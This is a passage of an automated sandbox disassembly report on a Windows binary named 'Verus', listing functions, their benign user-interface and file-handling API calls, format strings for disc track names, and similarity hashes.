Instruction Fuzzy Hash: 54714AB0604304AFD350DF66CC85A1BBBE8FB8C748F004A2EF599E7291D775A9488F56

Function 0041AA00 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0041AA1B

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,000004A6), ref: 0041AA37
SendMessageW.USER32(00000000,000000C5,0000001F,00000000), ref: 0041AA49
GetDlgItem.USER32(?,000004A8), ref: 0041AA53
SendMessageW.USER32(00000000,000000C5,0000001F,00000000), ref: 0041AA5F
GetDlgItem.USER32(00000000,000004A2), ref: 0041AA69
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041AA87
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041AAA2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041AABD
SendMessageW.USER32(?,0000014E,?,00000000), ref: 0041AAD1

Part of subcall function 0041A900: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041A912
Part of subcall function 0041A900: GetDlgItem.USER32(?,000004A4), ref: 0041A92B
Part of subcall function 0041A900: EnableWindow.USER32(00000000,00000000), ref: 0041A936
Part of subcall function 0041A900: GetDlgItem.USER32(?,000004A7), ref: 0041A941
Part of subcall function 0041A900: EnableWindow.USER32(00000000,00000001), ref: 0041A946
Part of subcall function 0041A900: GetDlgItem.USER32(?,000004A6), ref: 0041A951
Part of subcall function 0041A900: EnableWindow.USER32(00000000,00000001), ref: 0041A956
Part of subcall function 0041A900: GetDlgItem.USER32(?,000004A9), ref: 0041A961
Part of subcall function 0041A900: EnableWindow.USER32(00000000,00000001), ref: 0041A966
Part of subcall function 0041A900: GetDlgItem.USER32(?,000004A8), ref: 0041A971
Part of subcall function 0041A900: EnableWindow.USER32(00000000,00000001), ref: 0041A976

CheckDlgButton.USER32(?,000004A4,00000000), ref: 0041AAF4

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

SetDlgItemTextW.USER32(00000000,000004A6,?), ref: 0041AB28
SetDlgItemTextW.USER32(?,000004A8,?), ref: 0041AB52

Part of subcall function 0041A670: SetWindowTextW.USER32(?,00000000), ref: 0041A694

Strings

0x%x, xrefs: 0041AB01, 0041AB31

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$Window$MessageSend$Enable$Text$LongParent$ButtonCheckInfoParametersRectSystem_vswprintf_s
String ID: 0x%x
API String ID: 91320831-1033910204
Opcode ID: d8e7db6ab5d4c868a5545b9e75b2576f8b5d51a8bdb02fe9b2766749042ab6c6
Instruction ID: 3437a8fe7fc515a7cfcffa9f3aaab71eecfb100bd25775928f2736027d0099e1
Opcode Fuzzy Hash: d8e7db6ab5d4c868a5545b9e75b2576f8b5d51a8bdb02fe9b2766749042ab6c6
Instruction Fuzzy Hash: 054176B17803007FE210DB65DD96F6BB3A8EF88B14F10491DB3495B2C1DAB5F9508B69

Function 00458E10 Relevance: 24.4, APIs: 16, Instructions: 356windowfileCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00458ED2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00458EE7
DragQueryFileW.SHELL32(00000000,00000000,?,00000103), ref: 00458F00
GlobalUnlock.KERNEL32(?), ref: 00458F29
GlobalLock.KERNEL32(?), ref: 00458F92
GlobalSize.KERNEL32(?), ref: 00458FA4
GlobalUnlock.KERNEL32(?), ref: 00458FD9
ReleaseStgMedium.OLE32(?), ref: 00458FE4
ScreenToClient.USER32(?,FFFFFFFF), ref: 00459025
SendMessageW.USER32(?,00001012,00000000,FFFFFFFF), ref: 00459044
SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00459137
SendMessageW.USER32(00000000,0000104B,00000000,?), ref: 004591AB
SendMessageW.USER32(?,0000104B,00000000,?), ref: 00459241
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00459260
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 00459280
SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00459294

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Global$DragFileLockQueryUnlock$ClientMediumReleaseScreenSize
String ID:
API String ID: 261670760-0
Opcode ID: 7cd3abcccef0e8060f6b5938a039939f383e6ffdace40ac8036ee69c795f1c44
Instruction ID: 20617f0fe41254b20ae4a5f8795fc3dbbf95209f2441467fbbd0d4423bb418ab
Opcode Fuzzy Hash: 7cd3abcccef0e8060f6b5938a039939f383e6ffdace40ac8036ee69c795f1c44
Instruction Fuzzy Hash: B9E17D71608342AFD724DF25C880F6BB7E5BB88714F104A1EF99997392DB34E809CB56

Function 00464250 Relevance: 24.2, APIs: 16, Instructions: 157windowCOMMON

Download Yara Rule

APIs

CheckMenuItem.USER32(?,00008018,00000008), ref: 0046427A
CheckMenuItem.USER32(?,00008019,00000000), ref: 0046428A
CheckMenuItem.USER32(?,0000801A,00000000), ref: 0046429A
CheckMenuItem.USER32(?,0000801B,00000000), ref: 004642A9
CheckMenuItem.USER32(?,00008018,00000000), ref: 00464301
CheckMenuItem.USER32(?,00008019,00000008), ref: 00464311
CheckMenuItem.USER32(?,0000801A,00000000), ref: 00464320
CheckMenuItem.USER32(?,0000801B,00000000), ref: 00464330
CheckMenuItem.USER32(?,00008018,00000000), ref: 00464362
CheckMenuItem.USER32(?,00008019,00000000), ref: 00464371
CheckMenuItem.USER32(?,0000801A,00000008), ref: 00464381
CheckMenuItem.USER32(?,0000801B,00000000), ref: 00464391
CheckMenuItem.USER32(?,00008018,00000000), ref: 004643D5
CheckMenuItem.USER32(?,00008019,00000000), ref: 004643E5
CheckMenuItem.USER32(?,0000801A,00000000), ref: 004643F5
CheckMenuItem.USER32(?,0000801B,00000008), ref: 00464404

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CheckItemMenu
String ID:
API String ID: 253063483-0
Opcode ID: d96dd4f857b824a560358c1bcaf7664e6c598036859fe470e3a2b8836a4efb7b
Instruction ID: 253d478852246783db6fa0b8e01d8193ab6c7344cc5a0c4e9de9a145fef6ee0f
Opcode Fuzzy Hash: d96dd4f857b824a560358c1bcaf7664e6c598036859fe470e3a2b8836a4efb7b
Instruction Fuzzy Hash: ED417E70BC071577FDA497689C6BF152A56B798F24F60C01AB3417F2C28EE4B408A79C

Function 00440DF0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 145registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00440E11
_memset.LIBCMT ref: 00440E51
GetClassInfoExW.USER32 ref: 00440E6E
GetClassInfoExW.USER32(00000000,?,?), ref: 00440E7F
LeaveCriticalSection.KERNEL32(0053A264), ref: 00440E8A

Part of subcall function 00415F90: LeaveCriticalSection.KERNEL32 ref: 00415F9C

LoadCursorW.USER32(?,?), ref: 00440EDD
GetClassInfoExW.USER32(?,00000000,?), ref: 00440F27
LoadImageW.USER32(?,00000000,00000001,00000020,00000020,00000000), ref: 00440F56
LoadImageW.USER32(?,00000000,00000001,00000010,00000010,00000000), ref: 00440F6E
RegisterClassExW.USER32 ref: 00440F74
LeaveCriticalSection.KERNEL32(0053A264), ref: 00440F83

Strings

ATL:%p, xrefs: 00440EF7
0, xrefs: 00440E66

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ClassCriticalSection$InfoLeaveLoad$Image$CursorEnterRegister_memset
String ID: 0$ATL:%p
API String ID: 3685248764-2453800769
Opcode ID: 647c26aff46033d56df8fc8633a882b04537658fff31501e23b81e829c2fc1da
Instruction ID: e701a8fd379e1a53fbf138e68ce326802e198614b9778ea4f8f7c9af8f8ace31
Opcode Fuzzy Hash: 647c26aff46033d56df8fc8633a882b04537658fff31501e23b81e829c2fc1da
Instruction Fuzzy Hash: 4551CCB5604300DFEB14CF50D884B677BA8FB88700F10456AFE405B296D3B9E885CBAA

Function 004670A0 Relevance: 22.6, APIs: 15, Instructions: 135windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004670B0

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,000003EC), ref: 004670CC
SendMessageW.USER32(00000000,00001003,00000000,?), ref: 004670E9
SendMessageW.USER32(?,00001003,00000001,?), ref: 00467100
SendMessageW.USER32(?,00001036,00000000,00000020), ref: 00467112
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 0046715B
SendMessageW.USER32 ref: 0046717F
SendMessageW.USER32(?,0000101E,00000000,00000046), ref: 00467191
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004671DA
SendMessageW.USER32 ref: 004671FE
SendMessageW.USER32(?,0000101E,00000001,0000015E), ref: 00467213
GetDlgItem.USER32(00000000,00000001), ref: 0046721A
EnableWindow.USER32(00000000,00000000), ref: 00467225
GetDlgItem.USER32(?,00000002), ref: 0046722C
EnableWindow.USER32(00000000,00000001), ref: 00467231

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$Item$EnableLongParent$InfoParametersRectSystem
String ID:
API String ID: 2927372994-0
Opcode ID: a2aab543228ccdb91835b44f182dd2674a5ed0fc2de837999682588802a7a5f8
Instruction ID: e4131803172d73d5ac44b62bf95c875779967d98556e5b329a0618ae8c491723
Opcode Fuzzy Hash: a2aab543228ccdb91835b44f182dd2674a5ed0fc2de837999682588802a7a5f8
Instruction Fuzzy Hash: 62411EB0654300AFE360EF79CC85F5BB7E9AB88B04F00091DF299DB280D7B9A5448B55

Function 00424E10 Relevance: 22.6, APIs: 15, Instructions: 129windowtimeCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00424E2C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00424E3A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00424E4D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00424E5B
GetParent.USER32(?), ref: 00424E63
SendMessageW.USER32(00000000,00008000,00000000,00000000), ref: 00424E72
KillTimer.USER32(?,0000002A,?,00000000,00000000), ref: 00424EB9
SetTimer.USER32(?,0000002A,000003E8,00000000), ref: 00424ECC

Part of subcall function 00424D30: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00424D54
Part of subcall function 00424D30: SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424D6C
Part of subcall function 00424D30: SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424D7B
Part of subcall function 00424D30: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00424D8A
Part of subcall function 00424D30: SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424DA2
Part of subcall function 00424D30: SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424DB1
Part of subcall function 00424D30: EnableWindow.USER32(?), ref: 00424DC1
Part of subcall function 00424D30: EnableWindow.USER32(?), ref: 00424DC8
Part of subcall function 00424D30: GetParent.USER32(?), ref: 00424DCE
Part of subcall function 00424D30: GetDlgItem.USER32(00000000,00000001), ref: 00424DDE
Part of subcall function 00424D30: EnableWindow.USER32(00000000), ref: 00424DE1
Part of subcall function 00424D30: GetDlgItem.USER32(?,00000416), ref: 00424DEC
Part of subcall function 00424D30: EnableWindow.USER32(00000000), ref: 00424DF0
Part of subcall function 00424D30: GetDlgItem.USER32(?,00000418), ref: 00424DFB
Part of subcall function 00424D30: EnableWindow.USER32(00000000), ref: 00424DFF

GetDlgItem.USER32(?,0000041C), ref: 00424EE8
EnableWindow.USER32(00000000,?), ref: 00424EF9
IsDlgButtonChecked.USER32(?,00000469), ref: 00424F08
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424F30
GetDlgItem.USER32(?,00000469), ref: 00424F3B
EnableWindow.USER32(00000000,00000000), ref: 00424F4A
CheckDlgButton.USER32(?,00000469,00000000), ref: 00424F5F

Part of subcall function 00424020: IsDlgButtonChecked.USER32(?,00000489), ref: 0042404E
Part of subcall function 00424020: GetParent.USER32(?), ref: 00424060
Part of subcall function 00424020: SendMessageW.USER32(00000000,00008002,00000001,00000000), ref: 00424076
Part of subcall function 00424020: SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004240DD
Part of subcall function 00424020: SendMessageW.USER32(?,00000149,00000000,00000000), ref: 004240FC
Part of subcall function 00424020: SendMessageW.USER32(?,00000148,00000000,?), ref: 00424114
Part of subcall function 00424020: lstrcmpW.KERNEL32(?,?), ref: 00424120
Part of subcall function 00424020: SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00424134

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$EnableWindow$Item$ButtonParent$CheckedTimer$CheckKilllstrcmp
String ID:
API String ID: 3117400281-0
Opcode ID: e6b3ca679000acbcd4859d8da56309ae5e57e910717fb723e8fa2fc9d7aa0291
Instruction ID: d3f0dbf525fd8e68e0995da056a1cae4cc0ef39332733b62cc84c53eb07d6e8e
Opcode Fuzzy Hash: e6b3ca679000acbcd4859d8da56309ae5e57e910717fb723e8fa2fc9d7aa0291
Instruction Fuzzy Hash: B04153B53407047BD214EB65DD45F2BB7ADEBC8B00F51881DB746972D0DAB8F8008B69

Function 0041CD90 Relevance: 22.6, APIs: 15, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C8D0: GetParent.USER32(?), ref: 0041C92C
Part of subcall function 0041C8D0: GetWindowTextLengthW.USER32(00000000), ref: 0041C933
Part of subcall function 0041C8D0: GetParent.USER32(?), ref: 0041C940
Part of subcall function 0041C8D0: GetWindowTextW.USER32(00000000,?,00000001), ref: 0041C954
Part of subcall function 0041C8D0: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041C96D
Part of subcall function 0041C8D0: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0041C97B

SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041CDB4
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CDCC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041CDDB
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041CDEA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041CE02
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041CE11
EnableWindow.USER32(?), ref: 0041CE21
EnableWindow.USER32(?), ref: 0041CE28
GetParent.USER32(?), ref: 0041CE2E
GetDlgItem.USER32(00000000,00000001), ref: 0041CE3E
EnableWindow.USER32(00000000), ref: 0041CE41
GetDlgItem.USER32(?,00000416), ref: 0041CE4C
EnableWindow.USER32(00000000), ref: 0041CE50
GetDlgItem.USER32(?,00000418), ref: 0041CE5B
EnableWindow.USER32(00000000), ref: 0041CE5F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$Enable$ItemParent$Text$Length
String ID:
API String ID: 2097571647-0
Opcode ID: fcad21ff593138cc3550179682c5ed78ed6b32b0cbb3b9f352e0f43855f9fdef
Instruction ID: b845745212e443f685a61d308744654fe57817f71c5db96b8c68524a73aadea9
Opcode Fuzzy Hash: fcad21ff593138cc3550179682c5ed78ed6b32b0cbb3b9f352e0f43855f9fdef
Instruction Fuzzy Hash: 3B214DB17803047BE130ABA69C96F67B7ADAFC5F54F114C19B385AB2D0C9B5F440C668

Function 00424D30 Relevance: 22.6, APIs: 15, Instructions: 91windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00424870: GetParent.USER32(?), ref: 004248CC
Part of subcall function 00424870: GetWindowTextLengthW.USER32(00000000), ref: 004248D3
Part of subcall function 00424870: GetParent.USER32(?), ref: 004248E0
Part of subcall function 00424870: GetWindowTextW.USER32(00000000,?,00000001), ref: 004248F4
Part of subcall function 00424870: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0042490D
Part of subcall function 00424870: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0042491B

SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00424D54
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424D6C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424D7B
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00424D8A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00424DA2
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424DB1
EnableWindow.USER32(?), ref: 00424DC1
EnableWindow.USER32(?), ref: 00424DC8
GetParent.USER32(?), ref: 00424DCE
GetDlgItem.USER32(00000000,00000001), ref: 00424DDE
EnableWindow.USER32(00000000), ref: 00424DE1
GetDlgItem.USER32(?,00000416), ref: 00424DEC
EnableWindow.USER32(00000000), ref: 00424DF0
GetDlgItem.USER32(?,00000418), ref: 00424DFB
EnableWindow.USER32(00000000), ref: 00424DFF

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$Enable$ItemParent$Text$Length
String ID:
API String ID: 2097571647-0
Opcode ID: 9e9ad179c33abecffcd4d974e49f2c837e2942551d4df324d629105baf25e918
Instruction ID: aada983765a3bc776ac170be33674b6711c1a433847d55e5b1859feea23209ff
Opcode Fuzzy Hash: 9e9ad179c33abecffcd4d974e49f2c837e2942551d4df324d629105baf25e918
Instruction Fuzzy Hash: C2212CB578030477E130ABA69D96F57B7ACEFC5F44F114819B385AB2D0C9B5F900CA68

Function 0046C440 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 400windowstringCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0046C495
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0046C4A3
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0046C4EC
SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0046C507
SendMessageW.USER32(?,0000104B,00000000,?), ref: 0046C560
lstrcpyW.KERNEL32(?,?), ref: 0046C5A6
lstrcatW.KERNEL32(?,004C947C), ref: 0046C5B9
lstrcatW.KERNEL32(?,?), ref: 0046C5CF
SendMessageW.USER32 ref: 0046C61F
SendMessageW.USER32(?,0000100C,00000000,00000002), ref: 0046C924

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

Part of subcall function 00456C60: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456C91
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CA2
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CB3
Part of subcall function 00456C60: _wcsncat.LIBCMT ref: 00456CC7
Part of subcall function 00456C60: _vswprintf_s.LIBCMT ref: 00456CFA

Part of subcall function 0046C0B0: lstrcpyW.KERNEL32(?,?), ref: 0046C19C

Part of subcall function 00456E30: SendDlgItemMessageW.USER32(?,000003E8,00000402,-00000048,00000000), ref: 00456E89
Part of subcall function 00456E30: GetWindowTextW.USER32(?,?,00000040), ref: 00456EDA
Part of subcall function 00456E30: GetParent.USER32(?), ref: 00456F01
Part of subcall function 00456E30: SetWindowTextW.USER32(00000000,?), ref: 00456F10

Strings

Track %d.iso, xrefs: 0046C576
Track %d.wav, xrefs: 0046C585

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$lstrcpy$TextWindow_vswprintf_slstrcatlstrlen$ItemParent_wcsncat
String ID: Track %d.iso$Track %d.wav
API String ID: 2761038971-3781535765
